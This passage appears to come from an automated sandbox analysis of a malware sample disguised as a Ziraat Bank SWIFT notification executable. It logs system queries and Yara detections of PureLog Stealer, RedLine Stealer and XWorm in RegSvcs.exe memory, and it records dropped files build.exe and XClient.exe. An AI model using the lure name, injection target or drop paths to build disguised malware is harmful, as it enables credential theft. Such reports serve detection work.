Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST5268.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST5269.tmp VolumeInformation
Source: C:\Windows\System32\msdtc.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Locator.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00434E87

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00441E06 GetUserNameW,

0_2_00441E06

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00433F3A

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.3d96458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5390000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5390000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3d95570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300ee8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2a20f3e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300ee8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3dfb390.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1307610428.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1312948986.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1312584918.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003F3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_81
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_XP
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_XPe
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_VISTA
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_7
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_8
Source: niellist.exe, 00000011.00000002.1407658535.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.3d96458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5390000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5390000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3d95570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300ee8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2a20f3e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300ee8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3dfb390.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1307610428.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1312948986.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1312584918.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003F3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
